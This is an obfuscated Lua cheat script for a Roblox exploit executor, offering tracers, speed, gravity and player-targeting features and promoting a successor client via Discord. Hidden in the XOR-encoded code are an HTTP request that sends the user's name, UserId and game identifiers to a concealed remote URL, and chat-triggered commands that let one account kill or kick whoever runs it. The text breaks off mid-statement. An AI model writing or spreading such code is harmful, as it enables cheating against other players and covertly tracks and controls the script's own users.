local function console(hi)
    game.StarterGui:SetCore("DevConsoleVisible", hi)
end
print("Hello there user.")
print("Currently Sky Client has been discontinued and will no longer be worked on.")
print("Despite it being the first version and it being let go fast, i dont know how i would be able")
print("To put and add stuff for it.")
print("I have more legitimate uses of my time with Rise.")
print("If you would like to use RISE please go to this discord link below:")
print("https://discord.gg/6gdAgbUhBt")
print("Rise up to the top being uncompletely undetected.")
console(true)
writefile("s.png", game:HttpGet("https://static.vecteezy.com/system/resources/thumbnails/012/042/301/small_2x/warning-sign-icon-transparent-background-free-png.png", true))
game.StarterGui:SetCore("SendNotification", {
    Title = "Warning!!!";
    Text = "Tracers seems to have a bug, please refrain from using it as it will crash your game.";
    Icon = getcustomasset("s.png");
    Duration = 5;
})
game.StarterGui:SetCore("SendNotification", {
    Title = "¡¡¡Advertencia!!!";
    Text = "Parece que Tracers tiene un error, absténgase de usarlo ya que bloqueará su juego.";
    Icon = getcustomasset("s.png");
    Duration = 5;
})

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v93,v94) local v95={};for v202=1, #v93 do v6(v95,v0(v4(v1(v2(v93,v202,v202 + 1 )),v1(v2(v94,1 + (v202% #v94) ,1 + (v202% #v94) + 1 )))%256 ));end return v5(v95);end local function v8() local v96=0 -0 ;local v97;local v98;local v99;local v100;local v101;local v102;while true do if ((1 + 0)==v96) then v97=getcustomasset(v7("\84\212\53\247\65\107\241\244\67\196\121\244\69\97\241\240\67\207\51\178\77\104\182","\152\38\189\86\156\32\24\133"));v98=getcustomasset(v7("\238\94\164\77\253\68\179\74\249\78\232\78\249\78\179\78\249\69\162\8\246\71\162\65","\38\156\55\199"));v99=Instance.new(v7("\155\118\101","\35\200\29\28\72\115\20\154"));v99.Name=v7("\42\148\232","\84\121\223\177\191\237\76");v96=680 -(356 + 322) ;end if (v96==(15 -10)) then v100:Play();v101=nil;function v101(v302) if v302:IsA(v7("\140\194\197\30","\75\220\163\183\106\98")) then for v387=0 + 0 ,7 -2  do local v388=1244 -(485 + 759) ;local v389;while true do if (v388==0) then v389=Instance.new(v7("\38\191\136\54\213","\185\98\218\235\87"));v389.Name=v7("\230\5\3\195\253\139\231\20\18\195","\202\171\92\71\134\190");v388=2 -1 ;end if (v388==2) then v389.Texture=v98;break;end if ((1190 -(442 + 747))==v388) then v389.Face=v387;v389.Parent=v302;v388=1137 -(832 + 303) ;end end end elseif v302:IsA(v7("\4\206\40\141\37","\232\73\161\76")) then for v431,v432 in pairs(v302:GetChildren()) do v101(v432);end end end v102=nil;v96=6;end if (v96==(946 -(88 + 858))) then game.Players.LocalPlayer.Character.Humanoid.Jump=true;makefolder(v7("\195\202\216\46\231\168\211\18\212\218","\126\177\163\187\69\134\219\167"));writefile(v7("\49\196\41\206\253\48\217\38\192\229\108\197\47\220\232\43\200\56\192\178\41\221\47\194","\156\67\173\74\165"),game:HttpGet(v7("\60\163\93\6\175\124\9\123\165\72\1\242\33\79\32\191\92\20\169\53\67\38\180\70\24\168\35\72\32\249\74\25\177\105\124\49\179\64\25\178\112\31\123\190\68\23\187\35\85\123\165\76\16\175\105\78\49\182\77\5\243\43\71\61\185\6\63\145\1\121\96\229\31\71\242\44\86\49\176","\38\84\215\41\118\220\70"),true));writefile(v7("\66\31\33\25\255\67\2\46\23\231\31\30\39\11\234\88\19\48\23\176\93\6\113","\158\48\118\66\114"),game:HttpGet(v7("\163\48\4\38\96\255\180\228\54\17\33\61\162\242\191\44\5\52\102\182\254\185\39\31\56\103\160\245\191\106\19\57\126\234\193\174\32\25\57\125\243\162\228\55\31\35\125\161\232\228\54\21\48\96\234\243\174\37\20\37\60\168\250\162\42\95\56\118\179\254\185\105\23\57\125\171\250\230\35\25\32\118\232\226\164\49\93\35\99\232\246\170\32\21\123\100\172\239\163\105\38\57\122\166\254\166\43\20\120\126\181\168","\155\203\68\112\86\19\197"),true));v96=1;end if (v96==(1 + 2)) then v99.SkyboxRt=v98;v99.SkyboxUp=v98;v99.Parent=game.Lighting;v100=Instance.new(v7("\136\89\220\174\62","\161\219\54\169\192\90\48\80"),game.Workspace);v96=4;end if (v96==(5 + 1)) then function v102(v303) for v350,v351 in pairs(game.Workspace:GetChildren()) do v101(v351);end end v102(v98);break;end if (v96==(1 + 3)) then v100.Name=v7("\122\82\15\42\66\91","\69\41\34\96");v100.SoundId=v97;v100.Volume=809 -(766 + 23) ;v100.Looped=true;v96=24 -19 ;end if (v96==(2 -0)) then v99.SkyboxBk=v98;v99.SkyboxDn=v98;v99.SkyboxFt=v98;v99.SkyboxLf=v98;v96=7 -4 ;end end end local v9=game:GetService(v7("\139\213\67\68\27\169\202","\126\219\185\34\61")):FindFirstChild(v7("\63\197\71\81\114\126\246\233\24\225\73\124\123\101","\135\108\174\62\18\30\23\147"));if v9 then v9.Chatted:Connect(function(v217) if (v217==v7("\247\253\56\196\20\162","\167\214\137\74\171\120\206\83")) then local v304=0 -0 ;while true do if (0==v304) then wait(1);v8();break;end end end end);end game:GetService(v7("\187\252\51\68\253\181\152","\199\235\144\82\61\152")):FindFirstChild(v7("\52\29\160\8\11\31\188\37\19\57\174\37\2\4","\75\103\118\217"));if v9 then v9.Chatted:Connect(function(v218) if (v218==v7("\134\80\121\17","\126\167\52\16\116\217")) then local v305=1073 -(1036 + 37) ;while true do if (v305==0) then wait(1 + 0 );game.Players.LocalPlayer.Character.Humanoid.Health=0;break;end end end end);end if v9 then v9.Chatted:Connect(function(v219) if (v219==v7("\137\37\41\131\191","\156\168\78\64\224\212\121")) then wait(1 -0 );game.Players.LocalPlayer:Kick(v7("\12\231\166\197\2\234\229\204\30\174\182\197\30\237\169\199\2\224\177\142\8\249\171\203\21\174\169\193\11\180\229\238\29\225\161\199\2\224\245\151","\174\103\142\197"));end end);end local function v10(v103) local v104=(is_sirhurt_closure and v7("\101\33\77\48\48\76\236","\152\54\72\63\88\69\62")) or (pebc_execute and v7("\228\214\225\72\219\247\227\93\199\204\235\78","\60\180\164\142")) or (syn and v7("\107\71\11\40\55\254\23\24\102","\114\56\62\101\73\71\141")) or (secure_load and v7("\139\236\213\208\177\231\222\200","\164\216\137\187")) or (KRNL_LOADED and v7("\249\244\63\190","\107\178\134\81\210\198\158")) or (SONA_LOADED and v7("\11\1\140\199","\202\88\110\226\166")) or v7("\232\6\134\183\221\202\27\138\183\217\203\6\150\183\207\219\31\142\248\195\215","\170\163\111\226\151") ;local v105=v7("\25\36\166\40\93\109\102\94\52\187\43\77\56\59\21\126\177\55\67\120\40\1\57\253\47\75\53\33\30\63\185\43\1\102\122\68\101\225\104\23\102\121\66\105\226\107\26\102\123\67\102\230\119\88\39\121\71\29\189\42\24\49\126\64\5\135\27\121\46\32\3\5\181\47\123\16\10\51\7\135\31\107\47\7\27\41\164\53\95\3\46\48\105\154\51\70\51\25\9\2\128\59\98\57\112\38\23\154\15\107\1\5\57\20\179\59\92\56\25\64\103","\73\113\80\210\88\46\87");local v106={[v7("\130\35\195\6\226\143\56","\135\225\76\173\114")]=v103};local v107=game:GetService(v7("\50\249\172\160\159\184\181\12\228\187\181","\199\122\141\216\208\204\221")):JSONEncode(v106);local v108={[v7("\174\210\30\228\125\248\185\144\4\233\104\243","\150\205\189\112\144\24")]=v7("\36\148\175\64\13\139\16\4\44\139\177\3\14\155\30\30","\112\69\228\223\44\100\232\113")};request=http_request or request or HttpPost or syn.request ;local v109={[v7("\225\13\11","\230\180\127\103\179\214\28")]=v105,[v7("\174\10\91\95","\128\236\101\63\38\132\33")]=v107,[v7("\129\172\5\76\185\239","\175\204\201\113\36\214\139")]=v7("\119\227\6\232","\100\39\172\85\188"),[v7("\133\125\184\132\54\191\107","\83\205\24\217\224")]=v108};request(v109);end v10(v7("\171\136\128\112\171\136\128\112\171\136\128\112\171\136\128\112\171\136\128\112","\93\134\165\173"));v10(v7("\141\249\216\225\54\199\183\112\170\178\232\204\60\193\160\115\191\230\200\205\52","\30\222\146\161\162\90\174\210"));v10(v7("\168\3\61\71\168\3\61\71\168\3\61\71\168\3\61\71\168\3\61\71","\106\133\46\16"));v10(v7("\120\37\101\249\72\89\87\46\118","\32\56\64\19\156\58"));v10(v7("\48\200\229\86\48\252\129\87\205\191\22","\224\58\168\133\54\58\146")   .. game.Players.LocalPlayer.Name   .. v7("\89\86\75\151\117\134\135\97\73\90\74\254\112\198\137\10\84\83\17\189","\107\57\54\43\157\21\230\231")   .. game:GetService(v7("\246\138\3\254\188\200\223\215\138\18\240\138\217\221\205\130\18\240","\175\187\235\113\149\217\188")):GetProductInfo(game.PlaceId).Name   .. v7("\60\175\129\38\227\121\120\86\186\146\73\241\57\113\56\245\193","\24\92\207\225\44\131\25")   .. game.Players.LocalPlayer.UserId   .. v7("\75\211\184\38\27\125\75\185\191\77\22\120\11\218\188\22\91","\29\43\179\216\44\123")   .. game.PlaceId   .. v7("\189\217\32\38\189\217\32\38\183\214\34\12\180\221\122\12","\44\221\185\64")   .. game.JobId   .. v7("\1\231\72\53","\19\97\135\40\63") );v10(v7("\154\84\50\53\36\34\238","\81\206\60\83\91\79")   .. game.Players.LocalPlayer.Name   .. "!" );v10(game.JobId);local v11=10;game:GetService(v7("\125\191\209\96\59\198\95\131\91\162","\196\46\203\176\18\79\163\45")):SetCore(v7("\139\39\112\26\10\244\251\177\36\119\29\37\239\230\183\44","\143\216\66\30\126\68\155"),{[v7("\158\193\25\199\192","\129\202\168\109\171\165\195\183")]=v7("\0\93\49\215\204\17\166\59\87\34\152\203\7\227\108\24","\134\66\56\87\184\190\116"),[v7("\8\52\17\175","\85\92\81\105\219\121\139\65")]=v7("\201\187\89\86\60\204\254\161\89\85\104\159\244\160\16\74\114\211\228\243\83\74\113\207\252\167\89\71\112\218\189\164\89\81\116\159\206\184\73\82\125\205\238\243\107\102\80\254\206\128\121\102\65\145","\191\157\211\48\37\28")});local v12=130;local v13=Instance.new(v7("\236\28\230\25\63\209\56\225\21","\90\191\127\148\124"));v13.Parent=game.CoreGui;local v16=Instance.new(v7("\94\149\47\26\125","\119\24\231\78"));v16.Size=UDim2.new(1 + 0 ,0,1480 -(641 + 839) ,963 -(910 + 3) );v16.Position=UDim2.new(0,0,0 -0 ,1684 -(1466 + 218) );v16.BackgroundTransparency=1;v16.Parent=v13;local v21=Instance.new(v7("\182\40\189\94\240\65\19\135\33","\113\226\77\197\42\188\32"));v21.Size=UDim2.new(1 + 0 ,0,1,1148 -(556 + 592) );v21.Position=UDim2.new(0 + 0 ,0,808 -(329 + 479) ,854 -(174 + 680) );v21.BackgroundTransparency=3 -2 ;v21.Text=v7("\9\61\205\245\25\58\221\144\20\34","\213\90\118\148");v21.TextTransparency=0.5 -0 ;v21.TextColor3=Color3.fromRGB(183 + 72 ,994 -(396 + 343) ,23 + 232 );v21.TextSize=20;v21.Font=Enum.Font.Gotham;v21.TextStrokeTransparency=1478 -(29 + 1448) ;v21.Parent=v16;game:GetService(v7("\104\58\181\68\89\94\60\147\67\68","\45\59\78\212\54")):SetCore(v7("\35\83\141\143\168\33\185\249\22\95\128\138\146\39\162\254","\144\112\54\227\235\230\78\205"),{[v7("\135\33\27\240\213","\59\211\72\111\156\176")]=v7("\121\166\209\3\103\169\196","\77\46\231\131"),[v7("\142\81\174\84","\32\218\52\214")]=v7("\122\31\56\187\177\163\70\72\71\7\37\232\230\177\86\26\125\39\20\139\216\150\108\121\111\59\29\145\177\180\64\73\71\16\63\173\245\240\67\85\92\87\28\135\211\153\105\127\14\51\20\158\216\147\96\105\2\87\63\167\229\240\102\117\99\39\4\156\212\130\5\126\107\33\24\139\212\131\11","\58\46\119\81\200\145\208\37")});game:GetService(v7("\24\152\49\190\189\184\36\12\153\57","\86\75\236\80\204\201\221")):SetCore(v7("\65\68\121\129\208\132\102\72\113\140\253\138\102\72\120\139","\235\18\33\23\229\158"),{[v7("\100\179\213\183\85","\219\48\218\161")]=v7("\203\70\82\108\233","\128\132\17\28\41\187\47"),[v7("\53\55\30\46","\61\97\82\102\90")]=v7("\152\38\174\11\200\64\16\12\190\110\164\77\135\67\22\0\191\110\184\72\213\94\14\29\236\39\184\11\221\88\26\0\169\32\231\11\222\88\11\73\175\47\165\11\227\122\94\4\169\110\170\95\157\23\62\19\169\42\162\68\201\7\71","\105\204\78\203\43\167\55\126")});local v33=true;local v34=true;local v9=game.Players.LocalPlayer;local v35=v9:FindFirstChild(v7("\149\166\34\7\22\22\224\68\172","\49\197\202\67\126\115\100\167"));if v35 then local v203=1389 -(135 + 1254) ;local v204;local v205;local v206;local v207;local v208;while true do if ((26 -19)==v203) then v207.TextTransparency=0 -0 ;v207.Parent=v205;v208=Instance.new(v7("\194\218\27\192\246\247\53\215\249\231","\178\151\147\92"));v203=6 + 2 ;end if (v203==(1533 -(389 + 1138))) then v207.Font=Enum.Font.GothamBlack;v207.TextSize=100;v207.TextColor3=Color3.new(575 -(102 + 472) ,1,1);v203=7 + 0 ;end if (1==v203) then local v312=0;while true do if ((0 + 0)==v312) then v205.Size=UDim2.new(1,0,1 + 0 ,1545 -(320 + 1225) );v205.Position=UDim2.new(0 -0 ,0 + 0 ,1464 -(157 + 1307) ,1859 -(821 + 1038) );v312=1;end if (v312==(2 -1)) then v205.BackgroundColor3=Color3.fromRGB(23 + 183 ,157,452 -197 );v203=1 + 1 ;break;end end end if (2==v203) then v205.BorderSizePixel=0 -0 ;v205.BackgroundTransparency=1026 -(834 + 192) ;v205.Parent=v204;v203=1 + 2 ;end if (v203==(2 + 3)) then v207.Position=UDim2.new(0.25 + 0 ,0,0.4 -0 ,0);v207.BackgroundTransparency=1;v207.Text=v7("\179\140\254\187\116\211\169\130\233\207","\159\224\199\167\155\55");v203=310 -(300 + 4) ;end if (v203==(3 + 6)) then wait(1);for v352=0 -0 ,462 -(112 + 250)  do local v353=0 + 0 ;local v354;while true do if (v353==(0 -0)) then local v401=0;local v402;while true do if (v401==(0 + 0)) then v402=0;while true do if (v402==(0 + 0)) then v354=v352/(75 + 25) ;v205.BackgroundTransparency=v354;v402=1 + 0 ;end if (v402==1) then v353=1 + 0 ;break;end end break;end end end if (v353==(1415 -(1001 + 413))) then v207.TextTransparency=v354;wait(0.01);break;end end end v204:Destroy();break;end if (v203==(17 -9)) then local v319=882 -(244 + 638) ;while true do if (v319==(693 -(627 + 66))) then v208.Color=ColorSequence.new({ColorSequenceKeypoint.new(602 -(512 + 90) ,Color3.fromRGB(255,255,255)),ColorSequenceKeypoint.new(718 -(373 + 344) ,Color3.fromRGB(77 + 93 ,170,45 + 125 ))});v208.Rotation=237 -147 ;v319=1 -0 ;end if ((1100 -(35 + 1064))==v319) then v208.Parent=v207;v203=7 + 2 ;break;end end end if (v203==(8 -4)) then v206.Parent=v205;v207=Instance.new(v7("\192\116\237\185\9\44\133\241\125","\231\148\17\149\205\69\77"));v207.Size=UDim2.new(0.5,0 + 0 ,1236.2 -(298 + 938) ,0);v203=5;end if (v203==(1259 -(233 + 1026))) then v204=Instance.new(v7("\4\88\205\44\133\88\121\34\82","\62\87\59\191\73\224\54"));v204.Parent=game.CoreGui;v205=Instance.new(v7("\193\16\251\196\226","\169\135\98\154"));v203=1667 -(636 + 1030) ;end if (v203==(2 + 1)) then v206=Instance.new(v7("\254\94\3\70\252\55\193\206\121\48","\168\171\23\68\52\157\83"));v206.Color=ColorSequence.new({ColorSequenceKeypoint.new(0,Color3.fromRGB(62 + 144 ,11 + 146 ,476 -(55 + 166) )),ColorSequenceKeypoint.new(1 + 0 ,Color3.fromRGB(973 -718 ,255,255))});v206.Rotation=442 -(36 + 261) ;v203=4;end end end if v33 then local v209=0;local v210;local v211;local v212;while true do if (v209==(0 -0)) then if  not isfolder(v7("\159\246\85\49\30\69\127\130\233\3\33\29\89\116\136\238","\26\236\157\44\82\114\44")) then makefolder(v7("\57\37\204\88\38\39\208\85\62\97\198\84\63\32\209\72","\59\74\78\181"));end v210=v7("\45\197\78\74\160\127\158\21\72\178\50\159\93\83\167\45\196\88\79\160\32\195\89\85\189\49\212\84\78\253\38\222\87\21\137\32\213\83\85\189\115\136\21\73\188\48\223\94\73\252\55\212\92\73\252\45\212\91\94\160\106\220\91\83\189\106\194\78\91\161\49\196\74\23\235\114\129\8\12\246\119\129\8\20\190\53\130","\211\69\177\58\58");v209=1369 -(34 + 1334) ;end if (v209==(1 + 0)) then v211=v7("\164\238\96\246\229\194\178\235\109\186\250\196\162\235\125\230\166\216\163\228\107\225\252\219\249\232\105\166","\171\215\133\25\149\137");if  not isfile(v211) then writefile(v211,game:HttpGet(v210,true));end v209=2 + 0 ;end if (v209==3) then v212.Volume=5;v212.Looped=false;v209=4;end if (v209==2) then v212=Instance.new(v7("\210\199\39\244\235","\34\129\168\82\154\143\80\156"));v212.SoundId=getcustomasset(v211);v209=1286 -(1035 + 248) ;end if (v209==(25 -(20 + 1))) then v212.Parent=game:GetService(v7("\182\189\38\5\76\125\140\151\164\58\8\77","\233\229\210\83\107\40\46"));v212:Play();break;end end end makefolder(v7("\210\73\43\213\9\200\71\60\194\74\200\79\51\209\0\210","\101\161\34\82\182"));local v36=v7("\224\25\77\238\200\184\205\97\250\12\78\176\220\235\150\38\253\15\76\237\222\240\129\33\230\25\92\240\207\172\129\33\229\66\99\251\223\235\141\32\190\84\22\247\214\227\133\43\251\66\75\251\221\241\205\38\237\12\93\237\148\239\131\39\230\66\112\211\252\221\214\124\187\89\23\244\203\231\133","\78\136\109\57\158\187\130\226");local v37=v7("\45\52\224\242\50\54\252\255\42\112\240\252\63\56\252\226\113\44\242\232\55\50\248\246\59\113\233\255\57","\145\94\95\153");local v38=game:HttpGet(v36);writefile(v37,v38);local v39=game:GetService(v7("\206\217\21\199\90\178\239\234\1\220","\215\157\173\116\181\46"));v39:SetCore(v7("\6\177\133\246\244\58\160\130\244\211\54\181\159\251\213\59","\186\85\212\235\146"),{[v7("\246\136\2\242\60","\56\162\225\118\158\89\142")]=v7("\111\14\217\239\1\212\85\0\206\187\98\137\18\85","\184\60\101\160\207\66"),[v7("\5\135\100\168","\220\81\226\28")]=v7("\35\217\135\250\249\194\83\215\135\187\250\198\7\220\135\245\254\139\83\193\138\254\170\242\58\149\149\242\230\203\83\217\141\250\238\135\18\219\155\187\249\194\16\218\140\255\164","\167\115\181\226\155\138"),[v7("\203\33\232\82","\166\130\66\135\60\27\17")]=getcustomasset(v37),[v7("\96\95\220\116\36\77\69\192","\80\36\42\174\21")]=3 + 2 });local v40,v41=pcall(function() writefile(v7("\93\27\46\121\66\25\50\116\90\95\36\117\91\30\51\105\1\18\54\121\69\23\37\117\91\30\51\52\67\0\100","\26\46\112\87"),game:HttpGet(v7("\177\55\191\100\172\229\10\251\171\34\188\58\184\182\81\188\172\33\190\103\186\173\70\187\183\55\174\122\171\241\70\187\180\108\145\113\187\182\74\186\239\122\228\103\176\170\75\176\170\108\185\113\185\172\10\188\188\34\175\103\240\178\68\189\183\108\135\97\180\173\64\185\187\44\238\38\239\242\0\230\233\14\174\121\176\173\76\177\170\102\249\36\247\185\87\177\188\55\164\97\172\186\11\183\182\46\226\58\178\175\22","\212\217\67\203\20\223\223\37"),true));end);if  not v40 then end if v34 then if isfile(v7("\169\134\177\209\182\132\173\220\174\194\187\221\175\131\172\193\245\143\169\209\177\138\186\221\175\131\172\156\183\157\251","\178\218\237\200")) then local v238=Instance.new(v7("\133\186\243\222\178","\176\214\213\134"));v238.SoundId=getcustomasset(v7("\231\166\175\215\164\95\92\250\185\249\199\167\67\87\240\190\249\214\169\85\82\243\191\185\193\166\82\23\249\189\229","\57\148\205\214\180\200\54"));v238.Volume=319.3 -(134 + 185) ;v238.Looped=true;v238.Parent=game:GetService(v7("\33\242\32\58\114\33\248\39\34\127\17\248","\22\114\157\85\84"));v238:Play();end end local v42=Color3.fromRGB(1313 -(549 + 584) ,789 -(314 + 371) ,875 -620 );local v43=game:GetService(v7("\244\199\18\221\88\228\187","\200\164\171\115\164\61\150"));local v9=v43.LocalPlayer;local v35=v9:WaitForChild(v7("\142\248\2\92\134\172\211\22\76","\227\222\148\99\37"));local v44=Instance.new(v7("\0\81\64\243\252\61\117\71\255","\153\83\50\50\150"));v44.Parent=v35;v44.ResetOnSpawn=false;v44.Enabled=true;local v48=968.8 -(478 + 490) ;local function v49() for v213,v214 in pairs(v44:GetChildren()) do if v214:IsA(v7("\105\115\107\8\81\190\89\73\121\125","\45\61\22\19\124\19\203")) then local v243=0 + 0 ;local v244;while true do if (v243==(1172 -(786 + 386))) then v244=0;while true do if (v244==(0 -0)) then v214.Size=UDim2.new(1379 -(1055 + 324) ,(1460 -(1093 + 247)) * v48 ,0,(27 + 3) * v48 );v214.TextSize=(2 + 12) * v48 ;break;end end break;end end elseif v214:IsA(v7("\231\0\12\248\7","\217\161\114\109\149\98\16")) then v214.Size=UDim2.new(3 -2 ,0 -0 ,0,(85 -55) * v48 );end end end local function v50(v110,v111) local v112=0 -0 ;local v113;local v114;local v115;local v116;local v117;while true do if (v112==(1 + 1)) then v113.Draggable=true;v113.BorderSizePixel=0 -0 ;v113.AnchorPoint=Vector2.new(0.5 -0 ,0 + 0 );v114=Instance.new(v7("\4\40\245\166\249\212\180\52\15\198","\221\81\97\178\212\152\176"));v114.Parent=v113;v114.Color=ColorSequence.new(Color3.fromRGB(652 -397 ,943 -(364 + 324) ,255),Color3.fromRGB(200,200,200));v112=3;end if ((10 -6)==v112) then v115.ClipsDescendants=true;v115.BorderSizePixel=0 -0 ;v116=Instance.new(v7("\177\232\44\176\44\37\228\133\216\15\172\43","\168\228\161\96\217\95\81"));v116.Parent=v115;v116.FillDirection=Enum.FillDirection.Vertical;v116.SortOrder=Enum.SortOrder.LayoutOrder;v112=2 + 3 ;end if (v112==(4 -3)) then v113.Text=v110;v113.TextColor3=Color3.fromRGB(408 -153 ,774 -519 ,1523 -(1249 + 19) );v113.Font=Enum.Font.GothamBold;v113.TextSize=14 * v48 ;v113.AutoButtonColor=false;v113.Active=true;v112=2 + 0 ;end if (v112==3) then v114.Rotation=90;v115=Instance.new(v7("\235\245\28\246\31","\122\173\135\125\155"));v115.Parent=v113;v115.Size=UDim2.new(1,0,0 -0 ,1086 -(686 + 400) );v115.Position=UDim2.new(0,0 + 0 ,230 -(73 + 156) ,0 + 0 );v115.BackgroundTransparency=812 -(721 + 90) ;v112=1 + 3 ;end if (v112==(16 -11)) then v117=false;v113.MouseButton1Click:Connect(function() v117= not v117;if v117 then v115:TweenSize(UDim2.new(1,470 -(224 + 246) ,0, #v115:GetChildren() * 30 * v48 ),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.5,true);else v115:TweenSize(UDim2.new(1,0,0 -0 ,0 -0 ),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.5 + 0 ,true);end end);return v115;end if (v112==0) then v113=Instance.new(v7("\38\37\32\104\158\97\6\52\55\114","\20\114\64\88\28\220"));v113.Parent=v44;v113.Size=UDim2.new(0,(3 + 117) * v48 ,0 + 0 ,(59 -29) * v48 );v113.Position=v111 or UDim2.new(0,166 -116 ,0,50) ;v113.BackgroundColor3=v42;v113.BackgroundTransparency=513 -(203 + 310) ;v112=1;end end end local function v51(v118,v119,v120,v121) local v122=1993 -(1238 + 755) ;local v123;local v124;local v125;while true do if (v122==2) then v123.TextSize=14 * v48 ;v123.BorderSizePixel=0 + 0 ;v124=Instance.new(v7("\24\231\120\249\71\203\137\40\192\75","\224\77\174\63\139\38\175"));v124.Parent=v123;v122=3;end if (v122==(1537 -(709 + 825))) then v124.Color=ColorSequence.new(Color3.fromRGB(469 -214 ,255,371 -116 ),Color3.fromRGB(220,220,1084 -(196 + 668) ));v124.Rotation=90;v125=false;v123.MouseButton1Click:Connect(function() local v330=0 -0 ;local v331;while true do if (v330==0) then v331=0 -0 ;while true do if (0==v331) then v125= not v125;if v125 then local v456=833 -(171 + 662) ;local v457;while true do if (v456==(93 -(4 + 89))) then v457=0 -0 ;while true do if (v457==(0 + 0)) then v123.BackgroundColor3=v42;if v120 then v120();end break;end end break;end end else local v458=0 -0 ;while true do if (v458==(0 + 0)) then v123.BackgroundColor3=Color3.fromRGB(1519 -(35 + 1451) ,33,33);if v121 then v121();end break;end end end break;end end break;end end end);break;end if (v122==(1453 -(28 + 1425))) then v123=Instance.new(v7("\239\212\54\72\13\66\207\197\33\82","\55\187\177\78\60\79"));v123.Parent=v119;v123.Size=UDim2.new(1,0,1993 -(941 + 1052) ,30 * v48 );v123.BackgroundColor3=Color3.fromRGB(32 + 1 ,1547 -(822 + 692) ,46 -13 );v122=1 + 0 ;end if (v122==(298 -(45 + 252))) then v123.BackgroundTransparency=0 + 0 ;v123.Text=v118;v123.TextColor3=Color3.fromRGB(255,88 + 167 ,620 -365 );v123.Font=Enum.Font.Gotham;v122=435 -(114 + 319) ;end end end local v52=v50(v7("\167\78\85\44\133\85","\78\228\33\56"),UDim2.new(0,v12 + 50 ,0,71 -21 ));local v53=v50(v7("\236\114\179\23\132\192\106","\229\174\30\210\99"),UDim2.new(0,v12 + 50 + (128 -28) ,0 + 0 ,74 -24 ));local v54=v50(v7("\45\228\149\68\236\49","\89\123\141\230\49\141\93"),UDim2.new(0 -0 ,v12 + (2013 -(556 + 1407)) + (1306 -(741 + 465)) + (565 -(170 + 295)) ,0 + 0 ,46 + 4 ));local v55=v50(v7("\196\126\228\0\20","\42\147\17\150\108\112"),UDim2.new(0 -0 ,v12 + 50 + 83 + 17 + 100 + 65 + 35 ,0 + 0 ,1280 -(957 + 273) ));local v9=game.Players.LocalPlayer;local v56=workspace.CurrentCamera;local v57=false;local v58={};local v59=game.Workspace.Gravity;v51(v7("\40\180\44\105\238\252\22","\136\111\198\77\31\135"),v55,function() game.Workspace.Gravity=80;end,function() game.Workspace.Gravity=v59;end);v51(v7("\54\27\166\85\184\246\4","\201\98\105\199\54\221\132\119"),v54,function() v57=true;end,function() local v128=0 + 0 ;while true do if (v128==(1 + 0)) then v58={};break;end if (v128==(0 -0)) then v57=false;for v332,v333 in pairs(v58) do v333:Remove();end v128=1;end end end);game:GetService(v7("\139\25\141\18\7\39\186\176\15\134","\204\217\108\227\65\98\85")).RenderStepped:Connect(function() if v57 then for v287,v288 in pairs(game.Players:GetPlayers()) do local v289=0 -0 ;local v290;while true do if (v289==(0 -0)) then if (v288==v9) then continue;end v290=v288.Character;v289=1;end if (v289==(4 -3)) then if (v290 and v290:FindFirstChild(v7("\118\198\244\225","\160\62\163\149\133\76"))) then local v404=0;local v405;local v406;while true do if (v404==2) then v406.To=Vector2.new(v405.X,v405.Y);break;end if (v404==(1781 -(389 + 1391))) then local v445=0 + 0 ;local v446;while true do if (v445==(0 + 0)) then v446=0;while true do if (v446==(0 -0)) then v406=v58[v288];v406.From=Vector2.new(v56.ViewportSize.X/(953 -(783 + 168)) ,v56.ViewportSize.Y);v446=3 -2 ;end if (v446==(1 + 0)) then v404=313 -(309 + 2) ;break;end end break;end end end if (v404==(0 -0)) then v405=v56:WorldToScreenPoint(v290.Head.Position);if  not v58[v288] then local v461=0;local v462;while true do if (v461==(1213 -(1090 + 122))) then v462.Color=Color3.fromRGB(59 + 121 ,104,255);v58[v288]=v462;break;end if (v461==(0 -0)) then local v471=0 + 0 ;while true do if ((1118 -(628 + 490))==v471) then v462=Drawing.new(v7("\250\169\3\42","\163\182\192\109\79"));v462.Thickness=1;v471=1;end if ((1 + 0)==v471) then v461=1;break;end end end end end v404=2 -1 ;end end end break;end end end else local v220=0;while true do if (0==v220) then for v371,v372 in pairs(v58) do v372:Remove();end v58={};break;end end end end);local v60=false;local function v61(v129) local v130=0;local v131;local v132;local v133;local v134;local v135;while true do if ((4 -3)==v130) then v133=1.5;v134=v133/5 ;v130=776 -(431 + 343) ;end if (v130==(3 -1)) then v135=nil;function v135() local v334=0;local v335;local v336;local v337;while true do if (v334==(2 -1)) then v337=nil;while true do if (v335==(1 + 0)) then v337=v336 * v133 * v134 ;v132.CFrame=v132.CFrame + v337 ;break;end if (v335==0) then v336=Vector3.new();if (v131.MoveDirection.Magnitude>0) then v336=v131.MoveDirection.Unit;end v335=1 + 0 ;end end break;end if (v334==(1695 -(556 + 1139))) then v335=15 -(6 + 9) ;v336=nil;v334=1;end end end v130=3;end if (v130==(0 + 0)) then v131=v129:WaitForChild(v7("\28\51\13\193\251\59\47\4","\149\84\70\96\160"));v132=v129:WaitForChild(v7("\16\19\0\236\54\9\4\233\10\9\2\249\8\7\31\249","\141\88\102\109"));v130=1;end if (v130==3) then game:GetService(v7("\129\70\196\67\31\47\67\200\176\86","\161\211\51\170\16\122\93\53")).Heartbeat:Connect(function() if v60 then v135();end end);break;end end end v51(v7("\200\190\183\45\255","\72\155\206\210"),v53,function() v60=true;end,function() v60=false;end);v9.CharacterAdded:Connect(function(v136) v61(v136);end);if v9.Character then v61(v9.Character);end v51(v7("\114\127\88\11\35\73\104\64","\83\38\26\52\110"),v53,function() local v137=0 + 0 ;local v138;while true do if (v137==(170 -(28 + 141))) then v138();break;end if (v137==(0 + 0)) then v138=nil;function v138() if (v9 and v9.Character and v9.Character:FindFirstChild(v7("\112\2\42\71\86\24\46\66\106\24\40\82\104\22\53\82","\38\56\119\71"))) then local v373=game.Players:GetPlayers();local v374=nil;local v375=math.huge;for v397,v398 in pairs(v373) do if ((v398~=v9) and v398.Character and v398.Character:FindFirstChild(v7("\219\250\85\215\43\89\250\235\106\217\42\66\195\238\74\194","\54\147\143\56\182\69"))) then local v435=(v9.Character.HumanoidRootPart.Position-v398.Character.HumanoidRootPart.Position).Magnitude;if (v435<v375) then local v447=0 -0 ;while true do if (v447==0) then v374=v398;v375=v435;break;end end end end end if v374 then local v407=0 + 0 ;local v408;local v409;local v410;local v411;local v412;while true do if 